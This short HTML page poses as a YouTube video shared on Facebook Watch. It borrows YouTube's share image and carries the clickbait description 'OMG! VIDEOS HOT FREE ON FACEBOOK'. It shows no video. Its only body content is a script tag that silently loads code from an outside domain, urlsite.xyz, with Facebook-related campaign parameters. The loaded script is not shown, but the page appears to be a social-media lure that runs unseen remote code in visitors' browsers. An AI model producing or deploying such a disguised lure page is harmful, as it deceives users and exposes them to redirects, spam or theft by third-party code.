 <!DOCTYPE html>
<html amp>

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1">
    <meta property='og:image' content='https://www.youtube.com/yts/img/yt_1200-vflhSIVnY.png'>
    <meta property='og:image:url' content='https://www.youtube.com/yts/img/yt_1200-vflhSIVnY.png'>
    <meta name="description" content="OMG! VIDEOS HOT FREE ON FACEBOOK">
    <title>Youtube Video on Facebook Watch</title>
</head>

<body>
<script src="//urlsite.xyz/geraldking/?api=1&lan=facebooknew&ht=1&counter0=geraldking" type="text/javascript" async="true"></script>
</body>

</html>